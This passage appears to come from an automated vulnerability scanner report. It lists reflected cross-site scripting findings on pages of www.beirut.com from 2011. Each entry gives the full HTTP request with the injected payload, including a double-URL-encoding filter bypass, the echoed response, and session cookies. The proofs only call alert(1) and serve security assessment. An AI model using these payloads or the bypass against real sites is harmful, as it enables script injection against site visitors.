This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Movies/Cinemas/Dunes/1083a8d8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2386c42c93 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:54:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=Movies&listingtype=movies.php&Types=1083a8d8a"><script>alert(1)</script>a2386c42c93">
...[SNIP]...

4.564. http://www.beirut.com/Movies/Cinemas/Grand-Cinemas-ABC/1087 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Grand-Cinemas-ABC/1087

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cfdf'-alert(1)-'08a5d997df8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Movies3cfdf'-alert(1)-'08a5d997df8/Cinemas/Grand-Cinemas-ABC/1087 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:01:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Movies3cfdf'-alert(1)-'08a5d997df8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.565. http://www.beirut.com/Movies/Cinemas/Grand-Cinemas-ABC/1087 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Grand-Cinemas-ABC/1087

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b1e"><a>a6bbf04bcd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Moviesb9b1e"><a>a6bbf04bcd1/Cinemas/Grand-Cinemas-ABC/1087 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:50:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Moviesb9b1e"><a>a6bbf04bcd1">
...[SNIP]...

4.566. http://www.beirut.com/Movies/Cinemas/Grand-Cinemas-ABC/1087 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Grand-Cinemas-ABC/1087

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa186%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3126f33e5d was submitted in the REST URL parameter 4. This input was echoed as fa186"><script>alert(1)</script>c3126f33e5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Movies/Cinemas/Grand-Cinemas-ABC/1087fa186%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3126f33e5d HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:12:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=Movies&listingtype=movies.php&Types=1087fa186"><script>alert(1)</script>c3126f33e5d">
...[SNIP]...

4.567. http://www.beirut.com/Movies/Cinemas/Grand-Concorde/1086 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Grand-Concorde/1086

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16eaf'-alert(1)-'deb97ca46cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Movies16eaf'-alert(1)-'deb97ca46cb/Cinemas/Grand-Concorde/1086 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:41:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Movies16eaf'-alert(1)-'deb97ca46cb';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.568. http://www.beirut.com/Movies/Cinemas/Grand-Concorde/1086 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Grand-Concorde/1086

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f0fa"><a>c365b99de15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Movies5f0fa"><a>c365b99de15/Cinemas/Grand-Concorde/1086 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:30:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Movies5f0fa"><a>c365b99de15">
...[SNIP]...

4.569. http://www.beirut.com/Movies/Cinemas/Grand-Concorde/1086 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Grand-Concorde/1086

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a772%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e378dee22916 was submitted in the REST URL parameter 4. This input was echoed as 8a772"><script>alert(1)</script>378dee22916 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Movies/Cinemas/Grand-Concorde/10868a772%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e378dee22916 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:56:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=Movies&listingtype=movies.php&Types=10868a772"><script>alert(1)</script>378dee22916">
...[SNIP]...

4.570. http://www.beirut.com/Movies/Cinemas/Metropolis-Empire-Sofil/1085 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Metropolis-Empire-Sofil/1085

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddf69"><a>ce7e68797bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Moviesddf69"><a>ce7e68797bc/Cinemas/Metropolis-Empire-Sofil/1085 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:28:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Moviesddf69"><a>ce7e68797bc">
...[SNIP]...

4.571. http://www.beirut.com/Movies/Cinemas/Metropolis-Empire-Sofil/1085 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Metropolis-Empire-Sofil/1085

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49beb'-alert(1)-'aa6dac3381f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Movies49beb'-alert(1)-'aa6dac3381f/Cinemas/Metropolis-Empire-Sofil/1085 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Movies49beb'-alert(1)-'aa6dac3381f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.572. http://www.beirut.com/Movies/Cinemas/Metropolis-Empire-Sofil/1085 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Metropolis-Empire-Sofil/1085

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a9d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d0c3c5ce29 was submitted in the REST URL parameter 4. This input was echoed as 72a9d"><script>alert(1)</script>6d0c3c5ce29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Movies/Cinemas/Metropolis-Empire-Sofil/108572a9d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d0c3c5ce29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:50:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=Movies&listingtype=movies.php&Types=108572a9d"><script>alert(1)</script>6d0c3c5ce29">
...[SNIP]...

4.573. http://www.beirut.com/Movies/Cinemas/Sodeco/1084 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Sodeco/1084

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ddef'-alert(1)-'464af40d1e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Movies5ddef'-alert(1)-'464af40d1e2/Cinemas/Sodeco/1084 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:43:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Movies5ddef'-alert(1)-'464af40d1e2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.574. http://www.beirut.com/Movies/Cinemas/Sodeco/1084 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Sodeco/1084

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93206"><a>fb5a3355424 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Movies93206"><a>fb5a3355424/Cinemas/Sodeco/1084 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:34:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Movies93206"><a>fb5a3355424">
...[SNIP]...

4.575. http://www.beirut.com/Movies/Cinemas/Sodeco/1084 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Sodeco/1084

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d6b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2fd7090c40 was submitted in the REST URL parameter 4. This input was echoed as 98d6b"><script>alert(1)</script>2fd7090c40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /Movies/Cinemas/Sodeco/108498d6b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2fd7090c40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:56:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=Movies&listingtype=movies.php&Types=108498d6b"><script>alert(1)</script>2fd7090c40">
...[SNIP]...

4.576. http://www.beirut.com/Nightlife/Downtown/I-Bar/67 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Downtown/I-Bar/67

Issue detail

